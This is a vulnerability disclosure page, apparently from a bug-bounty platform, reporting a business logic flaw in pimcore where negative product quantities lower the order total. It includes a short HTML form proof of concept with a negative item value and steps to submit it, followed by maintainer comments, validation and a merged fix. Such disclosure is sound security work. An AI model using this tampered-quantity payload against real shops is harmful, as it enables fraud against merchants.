Business Logic Errors in pimcore/pimcore


Reported on

Jul 24th 2021

✍️ Description

Pimcore is vulnerable to Business Logic error through negative products amount.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="" method="POST">
  <input name="items[12]" value="1">
  <input name="items[440]" value="-69">
  <input type="submit">
  1. Save the above content into an HTML file.
  2. Open the HTML file on the browser and click on Submit button.
  3. Check out the total price.

PoC video.

💥 Impact

It is possible to get all products for free or with a very low price.

Bernhard Rusch
a year ago


@admin how can I signup as the maintainer of a project?

a year ago


Hey Bernhard, you should have access now. You will also automatically have access to all future pimcore disclosures. Do let me know if you encounter any further issues viewing the details of this report.

Bernhard Rusch
a year ago


Yep, works fine now, thanks a lot! 👍

Bernhard Rusch validated this vulnerability a year ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on f51595 a year ago
Bernhard Rusch has been awarded the fix bounty
to join this conversation